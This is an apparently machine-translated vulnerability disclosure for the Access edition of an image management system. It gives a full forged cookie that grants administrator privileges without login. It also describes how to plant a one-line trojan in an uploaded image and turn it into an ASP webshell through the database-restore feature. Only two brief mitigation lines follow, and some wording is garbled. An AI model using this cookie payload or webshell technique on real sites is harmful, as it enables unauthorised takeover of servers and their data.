About a year ago, I discovered the Cookie spoofing vulnerability in the Access edition of the image management system: any user can modify the Cookie to get the administrator privilege.
In February June this year, I sent an email to IOT platform about the vulnerability. They replied as follows:
"Hello, thank you for reminding me!
Wish you a happy and healthy family! "
Today, I downloaded the latest version (naipin_t_20100906_acc.rar) for testing and found that this vulnerability still exists.
Since the official team does not pay much attention to it, I will release it.
Netpic = ArticleFlag = 0 & UserName = redice & GroupID = 1 & Comment = 1 & Source = 0 & Article = 1 & PicFlag = 0 & Group = % C6 % D5 % CD % A8 % BB % E1 % D4 % B1 & Vote = 1 & UserId = 77 & Self = 1 & View = 1 & Manage = 0 & Upload = 1 & ViewHide = 0 & Setting = 1% 2C1% 2C1% 2C1% 2C1% 2C1% 2C1% 2C1% 2C1% 2C1% 2C1; ASPSESSIONIDCABRBATD = MDCHGDDALJGALHFHOIFLFJLL
Using the cookie above, you can also get administrator privileges without logging on...
The feasibility of Webshell:
This method can be used if the database suffix is asp. Upload user images and upload an image containing a Trojan with one sentence (using edjpgcom ).
Go to the background and use the database restoration function to restore uploaded images to the database.
Security Protection:
For more information about cookies, see the red/Black Alliance Article channel.
Temporarily shield the database recovery function and wait for the official upgrade